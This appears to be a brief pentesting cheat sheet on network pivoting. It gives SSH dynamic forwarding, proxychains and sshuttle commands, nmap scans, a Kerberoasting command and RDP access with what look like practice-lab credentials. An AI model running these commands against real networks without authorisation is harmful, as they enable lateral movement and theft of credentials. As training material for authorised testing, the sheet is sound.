Charlie Belmer A Pivot Cheatsheet for Pentesters
ssh -i pivot root@192.168.218.139Proxy
ProxyChains:
cat /etc/proxychains4.confCheck at the bottom for sock ip and port (this example is 9050)
ssh -f -N -D 9050 -i pivot root@192.168.218.139-f backgrounds the SSH
-N we do not want to execute remote commands (great for forwarding ports)
-D bind on port
proxychains nmap -p88 10.10.10.255 #checks kerberos
proxychains nmap 10.10.10.2252nd will check for open ports on that IP. Ones with “OK” will be open.
Sometimes the scan doesn’t work, you can:
proxychains nmap 10.10.10.225 -sT-sT is a tcp connect scan
You can run attacks thru proxychains:
proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip 10.10.10.225 -requestAccess a machine thru RDP on proxychains:
proxychains xfreerdp /u:administrator /p:'Hacker321!' /v:10.10.10.225sshuttle:
sshuttle -r root@10.10.155.5 10.10.10.0/24 --ssh-cmd "ssh -i pivot"Can directly nmap and stuff as long as this terminal is open
Chisel is also good